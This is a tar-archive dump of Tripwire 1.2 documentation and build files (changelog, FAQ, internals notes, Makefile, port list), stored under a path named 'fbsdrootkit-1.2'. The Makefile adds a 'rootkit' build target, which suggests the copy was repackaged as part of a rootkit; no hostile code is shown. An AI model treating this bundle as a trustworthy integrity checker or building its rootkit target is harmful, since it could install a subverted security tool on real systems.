intrusion detection, network protocols, virus detection, integrity management, secure patch distribution, and authentication. We have other projects we expect to begin in the near future. In addition to our existing COAST resources at Purdue, we're able to draw on expertise from other faculty and research groups within the department and university, including the Software Engineering Research Center and the Parallel and Distributed Systems group. Support for COAST is in the form of gifts and donations, directed grants, scholarships, and contracted research. We recognize three levels of sponsorship, based on contribution. We encourage donation of security-related software and hardware to our lab for use in our on-going research and education programs. Information on COAST can be found with WWW: http://www.cs.purdue.edu/homes/spaf/coast.html You can ftp a PostScript copy of a more complete precis describing COAST from coast.cs.purdue.edu as /pub/COAST/What_is_COAST.PS A paper copy can be mailed on request. We are currently seeking sponsors for additional COAST projects. Interested parties are invited to look at the precis document for details, or to call for more information. -- Professor Eugene Spafford COAST Project Director Department of Computer Sciences Purdue University West Lafayette, IN 47907-1398 spaf@cs.purdue.edu 317-494-0739 fax 317-494-7825 office fbsdrootkit-1.2/tripwire-1.2/Changelog100600 764 764 52703 5630546452 15150 0ustar dfdf# $Id: Changelog,v 1.51 1994/08/30 06:09:46 gkim Exp $ The following is the official list of changes between revisions: 1.2 (release) Tue Aug 30 01:06:08 EST 1994 Added README.FIRST, changed COAST.info, fixed FAQ. (thanks Spaf) Added revised designdoc.ps from CCCS conference. (thanks Spaf) 1.2 (pre-release) Fri Aug 26 01:04:23 MST 1994 fixed prompting error when answering "Y" or "N" during interactive updates. (thanks Terry Kennedy) fixed prompting error when answering "help" during interactive updates. (thanks Terry Kennedy) more documentation changes. (thanks Spaf) included twdb_newinode.pl script for people using fsirand. (thanks Spaf) purged old email addresses from release. (thanks Spaf) updated Ported file. (thanks Asokan) purged LITTLE_ENDIAN define from haval. (thanks Greg Black, Eugene Zaustinsky) figured out problems with flex. (thanks Greg Black and Vernon Paxson) added tw.conf for Irix. (thanks Keith Rickert) added twdb_check.pl utility. (thanks Tom Orban, Terry Kennedy, Spaf) 1.2 Mon Jul 25 11:03:29 EST 1994 fixed manual page install that removes files. (thanks Eugene Zaustinsky) fixed flex problems. (Finally!) fixed numerous small problems in code exposed by CodeCenter and alint. (thanks Spaf) fixed the definition of the SHA algorithm to conform to the updated NIST FIPS 180. (thanks Spaf, indirectly thanks to Steve Bellovin and Bruce Schneier) added kludge shell script to fix flex/lex script based on version in use. (thanks Spaf) more corrections to documentation. (from Spaf) 1.2beta5 Tue Jul 19 19:42:18 EST 1994 fixed symbolic link handling for machines w/o symbolic links. (thanks Keith Rickert) fixed configuration file reading routines. (thanks Keith Rickert) merged Spaf's documentation changes. added acknowledgements to testers to WHATSNEW and README. added references to SANS and AppDev papers. added support for BSDI. (thanks Eugene Zaustinsky) added support for Linux. (thanks Cal Page) another attempt to merge flex and lex files. 1.2beta4 Sat Jul 16 23:50:12 EST 1994 fixed SEEK_SET funkiness. (thanks Spaf) updated README, FAQ files. (thanks Spaf) added PGP signature to distribution. (thanks Spaf) 1.2beta3 Sat Jul 16 14:44:22 MST 1994 fixed list and database update routines to make Purify happy. fixed Haval signature printing on little-endian machines. (thanks Asokan) added better includes for . (thanks Spaf) replaced #elif directives with #ifdefs in Haval files. (thanks Spaf) fixed remaining word size problems. (thanks Asokan) fixed HP configuration file. 1.2beta2 Sun Jul 10 20:46:03 MST 1994 added code for new GNU flex/bison to ./contrib. What a nightmare. we need to figure out how to merge this stuff. (thanks Cal Page) merged code to support non-32bit longs in signature and Tripwire code. Among other things, this allows Tripwire to run the Alpha. (thanks Asokan) added support for Haval signature routine. (thanks Spaf) fixed filename escaping error in filename_escape_expand(). (thanks Kevin Wang) fixed "too many files open" error caused by @@includes. (thanks Thomas Kroeger and Spaf) added support for Motorola versions of Unix. (thanks Kevin Johnson) added support for SCO Open Desktop. (thanks Mark Kohler) added Makefile support for SCO. (thanks Alain Williams) changed manual pages to make less BSD-ish. (thanks Alain Williams) changed README to describe Haval. fixed list routine so clobbered entries retain their flag and priority values. changed all signature routines to use stdio routines for I/O. I've observed test suite runs speeding up by over 2x! (thanks Casper H.S. Dik) 1.2beta1 Sun Mar 27 17:25:04 MST 1994 integrated new list routines. (thanks Paul Hilchey) added support for HP Context Dependent Files. (thanks Cory Cohen) added ./contrib/README.cdf file. added files in ./contrib to fully support newer versions of flex/bison. (thanks Calvin Page) fixed references to twconvert and new databases. updated twconvert. 1.1.1beta2 Thu Feb 24 19:00:00 EST 1994 updated database number. fixed list routines to handle dbase entries better. (thanks Tom Orban) fixed symbolic link handling. (thanks Paul Szabo) fixed top-level Makefile. (thanks Calvin Page) fixed more Linux-isms. (thanks Calvin Page) fixed escaped filenames in added/deleted/changed file reporting. added warning about using specified dbasefile files in database initilization mode. (thanks Calvin Page) fixed error database file checking with "-d -" flag. (thanks Jason Downs) 1.1.1beta1 Tue Feb 22 21:46:02 MST 1994 rewrote list_set() and fixed list_unset(). (thanks Alain Brossard) added signature checking for symbolic link contents. (thanks Paul Szabo) fixed configfile_read() to reuse open file descriptors, so configuration files are not parsed more than once. added test for table of contents in dbase files. fixed internal filename handling routines. (thanks Paul Szabo) fixed test.sh so Apollos can run it. (thanks Paul Szabo) fixed temporary filename generation (I'm finding stdio's L_tmpnam increasingly suspicious). changed the way input file descriptors and named pipes are handled. (thanks Tom Orban) fixed hex printing routines in MD5, MD4, and MD2. (thanks Dan Bernstein and Spaf) fixed an "database file missing" error message in main.c. (thanks Rich Cohen) added note to config.h file about using "-c" ignore-masks for some backup programs. (thanks Spaf) fixed tw.config manual page. (thanks Spaf) added better support for Linux. (thanks Calvin Page) added better Solaris support in Makefile. added better support for Apollo Domain/OS. (thanks Paul Szabo) added better support for BSD/386. added notes for HPUX problems. (thanks Eric Boehm) fixed static allocation in lexer. 1.1 Wed Dec 15 01:06:07 EST 1993 changed b64 representation yet again. (thanks Spaf) changed dbaseversion number up to 3. (thanks Spaf) reading in old database sooner for more timely error messages. fixed missing L_tmpnam. updated manual pages. fixed siggen to better handle stdin. 1.1.beta5 Sun Dec 12 22:32:38 EST 1993 converging on Tripwire v1.1 release. (thanks Spaf) 1.1.beta4 Fri Dec 10 16:55:00 EST 1993 changed DB_VERSION_NUM to 2. added program twconvert to help convert to Tripwire format. added better handling for old dbase formats. removed opportunity for temporary database file spoofing. (thanks Matt Bishop) fixed inconsistent storage of dbase table of contents when updating the database. (thanks Eric Berggren) added better fatal error messages. fixed documentation and manual pages. (thanks Spaf) added -dfd option to specify open file descriptor for database files. (thanks Spaf) 1.1.beta3 Thu Dec 2 11:58:13 EST 1993 fixed interactive update oddities. (thanks Sam Gassel) fixed database not found error. (thanks Sam Gassel) added interactive test suite. added @@include to preprocessor test suite. made interactive update messages more human readable. 1.1.beta2 Fri Nov 26 06:16:52 EST 1993 fixed usage message. (thanks Drew Gonczi) fixed @@ifhost warning messages. (thanks Chris Kern, Jason Downs) fixed non-inheritance of new tw.config ignore-masks when doing updates. (thanks Berggren) fixed notice of SHA code optimization in WHATSNEW. (thanks Rik Farrow) added more thorough SunOS tw.conf.sun file. (thanks Rik Farrow) (old file moved to tw.conf.sun.old) fixed output of @@contents. allows @@{varname} expressions in parser. (thanks Spaf and Jim Napier) added reporting of symbolic link file types in integrity check report. "-rwxrwxrwx" now is correctly shown as "lrwxrwxrwx" (thanks Jim Napier) expanded preprocessor test suite. expanded update test suite. fixed "-d -" error case. (thanks Bruce Jolliffe and Drew Gonczi) got the Encore Multimax users running at last. (thanks Georges Tomazi) corrected preprocessor filename tracking, and error/warning messages. (thanks Eric Berggren) 1.1beta Sun Nov 14 00:32:17 EST 1993 made quietmode (-q) really quiet. (thanks Spaf) added exit status to indicate filesystem changes (see manual page). added support for ">" template for growing files. (thanks John Rouillard) fixed -update to add files in a more intelligent manner. fixed problem of `Hint: can't find database...' error message. changed "-update" logic. is now correct. all entries are now added if not in configuration file. all entries now are added with reasonable ignore mask. moved macro expansion into lexer. now, it really works. (thanks Spaf) this works too: @@foo/@@dir @@ignore added warning to catch partially-qualified @@ifhost directives. (thanks Baron Fujimoto) fixed root-anchoring problem that caused files to be scanned twice. (thanks John Rouillard) fixed handling of files with embedded spaces. (thanks Alain Brossard) added warning about possible overflows when building byteorder.h. (thanks Alain Brossard) fixed typo in tw.config(5) manual page. (thanks Eric Bergren) fixed handling of undefined macros. (thanks Patrick Sullivan) fixed misreporting of unchanged entries. fixed ./man install rule. (thanks Nora Hermida) changed the way filename are stored in lists to handle special characters in databases. got rid of misleading variable and function names in source. fixed boundary condition in list.c (removing head or tail of the list wasn't reflected in the hash table structure.) fixed Makefile dependencies for siggen. fixed entry number problem chaged order of file operations to allow -E to run w/o dbasefile. 1.0.5 Thu Sep 30 05:08:33 EDT 1993 fixed crc32 -- it didn't rewind the file descriptor. (thanks Eugene Zaustinsky) changed base64 alphabet. (thanks Eugene Zaustinsky) fixed filename escaping bug. fixed routines in list library that improperly handled case where items are clobbered. this caused files to appear on both the added and deleted lists in Tripwire. backed out '/dir/dir/@@variable' change. it breaks 'file @@ignore'! (thanks Bert Lindgren) updated README. 1.0.4 Wed Aug 18 23:02:14 EDT 1993 added support for '-cfd fd' option to allow open file descriptor to be specified for configuration file. (thanks Spaf) added SHS/SHA Secure Hash Algorithm to Tripwire distribution. changed CRC32 code to POSIX 1003.2 compliant signature (thanks Dan Bernstein) updated FAQ. (thanks Pat Macdonald, Eric Demerling). changed log-file template to ignore changes in inode ctime. (thanks John Rouillard) added support for Solaris 2.2/SunOS 5.2. (thanks Bob Cunningham) fixed another POSIX realloc() misuse, this time in -interactive code. (thanks E. Clinton Arbaugh) fixed lexical analyzer to allow '/dir/dir/@@variable' to expand correctly. (thanks Neil Todd) fixed grammar to make sure you can have @@variables in the middle of strings. (thanks John Rouillard) fixed MD4, MD5, MD2 code. finally got it right with a lot of cajoling and hand-holding. (thanks Eugene Zaustinsky) fixed Snefru code, backing out speedups to match Ralph Merkle's code more closely. added a rigorous signature test suite that is run before checking test database. changed name of sigfetch to siggen. added corresponding manual page and defunctified sigfetch manual page. (thanks Spaf) fixed siggen to use SIGNAME constants in config.h. siggen now gives a list of signature number to signature name mappings in usage message. changed ./src/Makefile CFLAGS option (thanks Spaf) changed test suite so it won't run from bottom-level makefile. changed test to ascertain whether '-cfd fd' was given a legit fd. changed test tw.config file to cover new files and uncover the files that we know will change (config.h, et al) (limited release for testing purposes) 1.0.3: Tue Apr 27 18:40:54 EST 1993 added 'tripwire -interactive' to allow users to be asked whether each added, deleted, or changed file should be updated. added help function in '-interactive' mode and '-help' that describes each inode field. (thanks John Rouillard) implemented a more consistent 'tripwire -update' routine that takes care of added, deleted, and updated entries. fixed incorrect 'tripwire -update' when used with symbolic links. (thanks E. Clinton Arbaugh) implemented printhex functionality in all signature routines. updated README and manual pages to refelct new modes. fixed MIPS/RISC-OS settings in Makefile. (thanks John Rouillard) fixed aux/Makefile clean and top-level Makefile. (thanks John Rouillard) fixed MD4 code -- I was thoroughly confused by the odd conventions used in this routine. (thanks Eugene Zaustinsky) chose more opportune time to print backup warning banner in '-update' mode. added AT&T 3B2 family of machines to ./configs directory and generalized routines for machines that don't have gettimeofday(). (thanks Joe Sirrianni) increased size of too-small char array in preen.c. (thanks Bob Hutchinson) changed filelist variable names to much more descriptive names. added machine-generated banner to ./aux/byteorder.c. fixed description of database file in ./includes/config.h. fixed 'sigfetch' utility to return correct error codes. added RCS tags to some straggler files. 1.0.2: Thu Dec 10 05:45:48 EST 1992 fixed @@ifhost xxx problem which dumped core. (thanks Rich Asmuth) fixed realloc() problem. (thanks Beth Elias and Joe Ramus) fixed -update problem which caused Tripwire to forget all about special files. (thanks Joe Ramus) fixed Changelog. I forgot about the Makefile fix. (thanks Tom Orban) more useful error message when Tripwire can't find configuration file. fixed 'tripwire -update' so it adds files explicitly specified on command line, but not in database. (thanks Drew Gonczi) Note that this needs some work -- we'll need to have an -add and -delete option to make this functionally clean and preserve database/tw.config semantics. first official patch :-) 1.0.1: Mon Nov 23 15:58:50 EST 1992 fixed placement of backup database file in database update mode. fixed install target in ./src and ./man Makefiles. (thanks Hugo Cartaxeiro) changed Ported entries for Pyramids. (thanks Peter Riili) fixed Acknowledgements section in README. (thanks Michael Barnett) fixed temporary filename generation problem. (thanks Gene Spafford) fixed DIST variable in ./tests Makefile. fixed typo in config.pre.y that prevented compilation with bison. first official release 1.0: Tue Nov 3 02:35:17 EST 1992 reorganized distribution into heirarchy. changed pathnames (./Tests -> ./tests, ./Databases -> ./databases). tripwire now creates ./databases directory if it doesn't already exist when -initialize. finished TODO list. ended beta testing period 0.92 beta 6: Tue Oct 20 14:55:03 EST 1992 attempting to fix macro recursion problem. (thanks Shabbir Safdar) fixed 'make test' variable assignment problem. (thanks Tom Gutnick) fixed lstat()/SVR3 problem. (thanks Simon Leinen) 0.92 beta 5: Sun Oct 18 19:33:19 EST 1992 integrated substantial source code cleanup patch. (thanks Ken McDonell) added types.c to glean struct stat info. added -i #|all flags, to specify which signatures to skip. this feature was added to make running Tripwire on an hourly basis reasonable. i.e., on hourly runs, check only CRC's. On daily runs, check md5. On weekly runs, check all signatures. (thanks John Rouillard) fixed usage message, and -D and -U error handling. added "-initialise" for people who don't speak American. :-) (thanks Michael Barnett) got signature object file dependencies right, finally. 0.92 beta 4: Fri Oct 16 18:32:36 EST 1992 the day of patch-infamy. a one-line fix to stop tripwire from saying all filenames are not absolutely qualified. *sigh* 0.92 beta 3: Fri Oct 16 18:02:59 EST 1992 fixed Makefile rule. (thanks Rich Salz) fixed duplicate yacc token. (thanks Rich Salz) fixed qualified filename bug. (thanks Ken McDonnel) removed htonl(), ntohl() routines in utils.c. added -D, -U flags to do command-line defines and undefines. (thanks John Rouillard) added more checks for null lists in list.c. @@ifdef and @@ifhost support logical expressions: @@ifdef (x || y && (z1 && (z2))) is now legal in tw.config grammar. @@ifhost (x || y && (z1 && (z2))) is now legal in tw.config grammar. added line continuation with '\' in tw.config grammar. added @@echo for testing. maybe we'll keep it? default ignore flags and templates now ignore signatures 3-9. added [()|&] as characters that need to be escaped in database. fixed filename_escape_expand(). 0.92 beta 2: Fri Oct 16 12:18:28 EST 1992 finally fixed up '=' pruning. (thanks David Wiseman) added Porting database. added transient file handling in config.parse.c. fixed comment handling in config.parse.c. merged gazillions of platform dependencies. let's hope everything still works. reorganized Makefile so it's easier to spot your own platform, I hope. make Tripwire compiles bearable for systems w/o BSD filesystems. various semantic and lint cleanups. reorganized phase 3 presenation. more verbose, hopefully clearer. (thanks Christopher Samuel) added user-contributed tripwire.config files. purged >14 character filenames: database.build.c -> dbase.build.c tripwire.config -> tw.config tripwire.database_@ -> tw.db_@ ^^-- room for 9-character hostname added COPS interface in ./contrib. (thanks Shabbir Safdar) added "-f dbasefile" option to specify alternate dbase file. (allows "-f -" to read from stdin.) added "-c configfile" option to specify alternate config file (allows "-c -" to read from stdin.) added code to escape filenames starting with '#'. added tw.config preprocessor directives: @@ifhost @@define x VAR @@undef x @@ifdef x @@endif @@include ...and variable substition (@@x --(turns into)--> VAR) added "-E" or "-preprocess" to print out processed tw.config file. (ala "cc -E" or "cpp".) added incremental database. (-update entry) md5 fix for Cray. (thanks John Cristy) AIX fix for stat structure. (thanks Shabbir Safdar) config_interpolate() now caches vectors, instead recomputing every time. tripwire now makes backup of files when doing "-update". played with profiler. halved the number of calls strlen(). (I wonder if we can do the same with strcpy().) made backup file 14-character length friendly for SVR3 people. so, now tripwire is completely 14-character filename friendly, right? implemented tw.config parsing routines in lex and yacc added @@dbaseversion directive to specify what format the tw_db files use. this is to prevent reading in unknown database files. completed filename_escape_expand() to handle all sorts of escape sequences (escaped octals, cooked-style escaped characters, and all of tripwire's special characters [e.g., '\@']). added warning of null characters in filename. created consistent escaping and de-escaping of characters to and from database. sped up character escaping routines by using all table-lookups. moved database format strings into the header file. list generation sped up (1500 files in 20 seconds on Sequent). added tw.config.5 manual page, which describes the tw.config syntax and preprocessor directives. added @@else directive to tw.config parser. changed signature routines to return number in base-64. this has the unfortunate effect of making all the signatures look like pathnames, but it does make signature storage 6 bytes instead of 8 bytes. added support for 10 signatures. fixed tripwire -update. now skips directory entries when regenerating database. added CRC16 and CRC32 to signature routine repository. added "sigs.h" to make signature routines more general. added MD2 and MD4. changed 'make test' so no files are clobbered. fixed '-d dbasefile' bug. 0.9beta8: Thu Sep 17 19:06:18 EST 1992 eliminated use of 'sort' and 'diff', using list routines instead (fixed tripwire confusion in parsing '=' additions from diff which generated zillions of bogus changed file entries.) this speeds up Phase 3 considerably, since we don't sort! sped up linked-list/hash routines (HASHSZ increased by 100x) removed diff.sorted.c (thanks to the five people who tested this: David Wiseman, John Sutton, Lance Bailey, John Rouillard, David Smith). 0.9beta7: Thu Sep 10 20:45:02 EST 1992 fixed list initialization routine. fixed Makefile, README, manual page. fixed memory leak problems (spotted by Purify). fixed default ignore-masking handling bug. (didn't convert to internal form first) fixed ignore-mask parsing. (David Smith) added banner to Tripwire databases on creation. taught tripwire to say what version it is. sped up most commonly called routines (config_interpolate() and slash_count()). Thanks Rich Salz! 0.9beta6: Wed Sep 09 21:04:35 EST 1992 First version of Tripwire to see the light of day. fbsdrootkit-1.2/tripwire-1.2/FAQ100600 764 764 11554 5630546454 13671 0ustar dfdf# $Id: FAQ,v 1.19 1994/08/30 06:09:48 gkim Exp $ # # FAQ for Tripwire # This file answers frequently asked questions about Tripwire. The first section of the file covers Tripwire concepts and design, while the second section addresses troubleshooting. Concepts: ========= Q: Why doesn't Tripwire ever traverse across mounted filesystems? A: This is a feature. This behavior makes it possible to put a directory (e.g., '/') in your tw.config file, and you won't have to worry whether it will traverse all the locally-mounted filesystems. If you want it do the whole filesystem, list each partion separately in the configuration file. Q: What is the difference between pruning an entry in your tw.config file (via "!") and ignoring everything (via the "E" template)? A: Ignoring everything in a directory still monitors for added and deleted files. Pruning a directory will prevent Tripwire from even looking in the specified directory. Q: Tripwire runs very slowly. What can I do to make it run faster? A: You can modify your tw.config entries to skip the Snefru signatures by appending a "-2" to the ignore flags. Or you can tell Tripwire at run-time to skip Snefru by: tripwire -i 2 This computationally expensive operation may not be needed for many applications. (See README section on security vs. performance trade-offs for further details.) Troubleshooting: ================ Q: I build Tripwire and the test suite fails. What do I do? A: Read the README section on "Common Compilation Problems." Q: Tripwire reports that my database version is out of date. What should I do? A: The database format used by Tripwire v1.2 changed. You need to rebuild the database with Tripwire v1.2; see the README file for details. Q: Where do I find Larry Wall's patch program? A: You can get it via anonymous FTP at ftp.uu.net:/pub/patch.tar.Z. Q: When running Tripwire in Integrity Checking mode, Tripwire fails when it tries to find a file with a name consisting of dozens/hundreds/thousands of '/'s. What went wrong? A: Your setting for the #define DIRENT value in your conf-.h file is probably incorrect. Trying switching the setting and see if the problem goes away. (i.e., switch #define to #undef, or vice versa.) Q: I have /tmp in my tw.config file, but none of the files in the directory are being read by Tripwire. What's going on? A: Check to see that your /tmp directory isn't a symbolic link to another filesystem. When recursing down into directories, Tripwire never traverses symbolic links or enters another filesystem. Q: Is there any way I can get Tripwire to print out the names of the files as they are being scanned? I want to know which files Tripwire is spending all of its time crunching. A: Try using 'tripwire -v'. This wasn't documented in the first tripwire.8 manual page. Q: I try to initialize the database by typing 'tripwire -initialize' but I can't find the binary. Where is the tripwire executable? A: ./src/tripwire is where the binary is built. 'make install' will install in the $(DESTDIR) of your choice, as defined in the top-level Makefile. Q: I have the following line in my tw.config file to do host specific actions. Why doesn't it work? @@ifhost chapel || chekov || chewie || data || guinan .... @@endif A: You must put the hostnames as returned by 'hostname' or 'uname' (depending on whether you're running a BSD or SYSV derived OS). So, the correct form would be: @@ifhost chapel.enterprise.fed || chekov.enterprise.fed ... The Tripwire preprocessor tries its best to figure out if you have used misformed hostnames. Q. As part of my operational security plan for my exported NFS partitions, I want to run "fsirand" regularly. Unfortunately, if I do this, Tripwire will complain that every file has changed (because the i-node numbers will change). I don't want to rebuild the entire system database each time. What can I do? A. We have included a Perl script in the distribution that will go through a Tripwire db file (the output database) and update the i-node fields while leaving everything else the same. To use it, you need to modify the first line to point to your Perl interpreter (if you don't have Perl, you'll need to write your own program in C or get Perl from an ftp site). The Perl script is ./contrib/twdb_newinode.pl. After the next time you are in single-user mode running fsirand, run this script with the db as input. For example, cd /usr/local/adm/tcheck/databases ./twdb_newinode.pl tw.db_myhost It will automatically create a backup version of the file for you as a "just in case." *Afterwards, be certain to set the disk with the database back to read-only!!* Also, store the Perl script in the same secure place as the Tripwire program. Gene & Gene Kim & Spafford Last updated: July 17, 1994 (gkim@cs.purdue.edu) (spaf@cs.purdue.edu) fbsdrootkit-1.2/tripwire-1.2/INTERNALS100600 764 764 2767 5611471034 14575 0ustar dfdf As times passes since the initial release of Tripwire, memories fade, and things that I used to assume as obvious are no longer quite so clear. These are some notes I made to help me remember internal Tripwire implementation details. Surely other people besides myself might benefit from this. Adding new signature routines: ============================== Add the files under the ./sigs directory. Use the md4 directory as a template -- it needs to know what endian your machine is, which we glean at compile time in the Tripwire build. Use md4wrapper.c as a template for "wrapping" the signature routine to interface with Tripwire. Remember, if you use pltob64(), the signature string will already be null-terminated. However, when generating your hex signature, you'll have to manually affix a null. Look next at ./include/config.h. You'll need to change a couple of defines, namely the SIGxFUNC and SIGxNAME defines that tell Tripwire what function to call and what to name the routine. Next, edit ./src/Makefile and change the SIGxDIR, OSIGx, and CSIGx variables at the top of the Makefile. Lastly, add a line in the ./include/tripwire.h to include the signature prototype file. Don't forget to change the file ./tests/tw.conf.test to exclude those new object files from the Tripwire test suite. At the time of this writing, nine of the ten slots are taken. So maybe people won't have to (or be able to) add new signature routines in the future. :-) Gene Kim 10 July 1994 fbsdrootkit-1.2/tripwire-1.2/Makefile100600 764 764 7155 6273465303 14756 0ustar dfdf# $Id: Makefile,v 1.16 1994/07/25 15:59:41 gkim Exp $ # # Tripwire build # # See the README file before running this! # ### ### Start of user-modified settings ### Examine these and change the ones that need to be ### Altered on your system ### # destination directory for final executables DESTDIR = /secureplace/bin # destination for man pages MANDIR = /usr/man # system utilities LEX = lex #LEX = flex # For the GNU crowd YACC = yacc #YACC = bison -y # For the GNU crowd (make it look like yacc) # # see ./contrib/README.linux for tips on # # making work. # for SVR4 make (must be a Bourne-type shell) SHELL = /bin/sh #SHELL = /bin/ksh # Another common shell #SHELL = /bin/bash # For the GNU fanatics # you can use ANSI C if you like, but K&R is equally fine. CC = cc # common #CC = gcc # also common #CC = /usr/ccs/bin/cc # Pyramid DC/OSx (SVR4) CFLAGS = -O # common #CFLAGS = -g # common #CFLAGS = -g # debugging #CFLAGS = -O -cckr # SGI # NOTE: some versions of the HP C compiler optimizer breaks snefru.c! # consider recompiling this file seperately without optimization #CFLAGS = -O -Aa -N # HP/UX ansi #CFLAGS = -O -Ac -N # HP/UX K&R #CFLAGS = -O -Ac -N -Wl,-a,archive # HP/UX K&R, insure archived, static link #CFLAGS = -systype bsd43 # ETA/10 (SVR3) #CFLAGS = -systype bsd43 # MIPS RISC/OS 4.5x #CFLAGS = -O -ansi # gnu CC #CFLAGS = -O -ansi -W -Wreturn-type -Wswitch -Wshadow # gnu CC w/all warnings #CFLAGS = -OG # Pyramid OSx #CFLAGS = -O -Kold # Pyramid DC/OSx (SVR4) #CFLAGS = -DTW_TYPE32='int' # DEC OSF/1 Alpha (or any other architecture # where int [but not long] is a 32 bit quantity) # a C preprocessor (to build inode.h) CPP = $(CC) -E # common #CPP = /usr/lib/cpp # on older systems #CPP = /lib/cpp # on older systems # make sure libraries are not linked dynamically (as a security measure) LDFLAGS= # common #LDFLAGS= -non_shared # OSF/1 #LDFLAGS= -Bstatic # SunOS 4 (cannot statically link tripwire # on Solaris 2.3) #LDFLAGS= -dn # Pyramid DC/OSx (SVR4) # libraries LIBS = # common #LIBS = -lsocket # SCO #LIBS = -lmalloc -lsun -lc_s # IRIX 4.0 #LIBS = -lx # Xenix #LIBS = -lbsd # MIPS RISC/OS #LIBS = -lgnumalloc # Encore / UMAX V # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /usr/bin/install # common #INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4) #INSTALL= /etc/install # Pyramid OSx #INSTALL= /bin/cp # no install #INSTALL= /usr/bin/installbsd # OSF/1 (DEC only?) # how you get hostname information (BSD vs. SYSV style) HOSTNAME = "hostname" # BSD #HOSTNAME = "uname -n" # System V ### ### End of user-modified settings ### You should not need to change anything after this ### DIST = tripwire-1.2 all: (cd aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) (cd src; make CC=$(CC) CFLAGS="$(CFLAGS)" LIBS="$(LIBS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) \ YACC="$(YACC)" LEX="$(LEX)" all) install: all (cd src; make INSTALL=$(INSTALL) DESTDIR=$(DESTDIR) install) (cd man; make INSTALL=$(INSTALL) MANDIR=$(MANDIR) install) test: all (cd tests; make HOSTNAME=$(HOSTNAME) DIST=$(DIST) SHELL=$(SHELL) \ CC=$(CC)) clean: (cd src; make clean) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core clobber: clean (cd src; make clobber) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core rm -f */*_pure_*.o sigs/*/*_pure_*.o rootkit: (cd src; make tripwire) fbsdrootkit-1.2/tripwire-1.2/Ported100600 764 764 26216 5620062005 14500 0ustar dfdf## $Id: Ported,v 1.17 1994/08/04 03:44:05 gkim Exp $ ## Following is an information list of machines to which ## Tripwire has been ported. This lists the OS environment, ## special flags, skeleton config file, and other info ## to enable you to get up and running. It is *not* quite ## complete because not every filesystem configuration will ## be represented in this list. ## ## Also, we credit (and thank again!) our beta testers who ## provided this information for the release. vendor: several (486/66 PC) os: 386BSD os version: 0.1 patchlevel 0.2.4 compiler: gcc and cc both work cflags: -O ldflags: libs: conf.h: conf_bsd.h tw.config: tw.conf.386bsd notes: contributor: Cor Bosman vendor: several (386/25 PC) os: linux os version: 0.99.14 compiler: gcc cflags: -O ldflags: libs: conf.h: conf-linux.h (the system default) tw.config: tw.linux notes: CC=gcc YACC=bison -y FLEX=flex contributor: Cal Page vendor: Apple os: A/UX os version: 3.x compiler: cc cflags: -O ldflags: libs: conf.h: conf-aux3.h tw.config: contributor: Phillip Porch (root@raidernet.com) vendor: AT&T os: System V os version: Release 3.2.3 compiler: cc cflags: -O ldflags: none conf.h: conf-3b2g.h tw.config: Working on one notes: Had to modify some source contributor: Joe Sirrianni vendor: AT&T os: System V os version: Release 4.0.3 compiler: cc cflags: -O ldflags: none conf.h: conf-3b2gr.h tw.config: Working on one notes: contributor: Joe Sirrianni vendor: Carnegie-Mellon University os: Mach os version: 2.x compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-mach.h tw.config: not available contributor: Peter Shipley vendor: Convex os: ConvexOS os version: 9.1 compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-convex.h notes: contributor: Adrian P. van Bloois vendor: Cray Research os: Unicos os version: 6.1.6 compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-unicos.h notes: contributor: Michael Barnett contributor: cristy@eplrx7.es.duPont.com (John Cristy) contributor: John Sutton vendor: DEC os: OSF/1 (alpha) os version: 1.3 compiler: cc cflags: -DTW_TYPE32='int' ldflags: -non_shared libs: none conf.h: conf-osf1.h notes: should use INSTALL= "/usr/bin/installbsd" or notes: INSTALL= "/usr/bin/installbsd -c" contributor: Asokan vendor: DEC os: OSF/1 (alpha) os version: 2.0 compiler: cc cflags: -g -DTW_TYPE32='int' ldflags: -non_shared libs: none conf.h: conf-osf1.h notes: Without the -g flag the compiler(actually "ugen") spins on md5.c notes: should use INSTALL= "/usr/bin/installbsd" or notes: INSTALL= "/usr/bin/installbsd -c" contributor: Asokan vendor: DEC os: Ultrix os version: 4.x compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-bsd.h notes: contributor: Shabbir Safdar contributor: John Sutton contributor: Michaela Harlander contributor: Edward DeHart vendor: Encore (Multimax) os: Umax V os version: 2.4.1.P3 compiler: cc cflags: -O ldflags: libs: -lgnumalloc conf.h: conf-umaxv.h notes: *** there is a bug in the Encore malloc() library *** notes: *** please see ./contribs/encore.malloc for a workaround *** notes: *** thanks George Tomazi *** contributor: Michael Barnett contributor: Georges Tomazi vendor: FPS os: FPX os version: 4.3.3 compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-bsd.h tw.config: notes: contributor: John Sutton vendor: HP os: HP/UX os version: 8.x, 9.x compiler: cc cflags: -O -Aa -N (ansi) cflags: -O -Ak -N (k&r) cflags: -O -Wl,-a,archive -O -Ac (ensure archived, NO shared libraries) ldflags: libs: conf.h: conf-hpux.h notes: from Lance Bailey: notes: -Aa ansi notes: -Ac K&R notes: -Wl,-a,archive ensure archived and NOT shared libraries on linking notes: -O optimizer notes: -g debugger notes: some versions of the HP C compiler optimizer breaks snefru.c! notes: consider recompiling this file seperately without optimization notes: (-spaf and genek) notes: *** Some people are having considerable difficulty getting notes: *** getting Tripwire to run using gcc. Please see the notes: *** ./contrib/README.hpux file for details. notes: notes: support for CDF added by Cory Cohen. see ./contrib/README.cdf notes: contributor: Lance Bailey contributor: Joe Polcari contributor: Michaela Harlander contributor: Cory F. Cohen vendor: HP/Apollo os: Domain/OS os version: SR10.X (m68k or a88k, BSD) compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-apollo.h tw.config: tw.conf.apollo notes: Should work for all SR10 releases, but I only notes: tried SR10.4, and SR10.2.P and SR10.4.P. notes: I used cc version 6.7 for 10.2, 6.9 for 10.4. notes: Need '-A nansi' for src/utils.c at pre-SR10.4. notes: [this may not be necessary anymore -- ghk 2/19/94] contributor: Paul Szabo vendor: IBM os: AIX os version: 3.x compiler: cc cflags: -g ldflags: none libs: none conf.h: 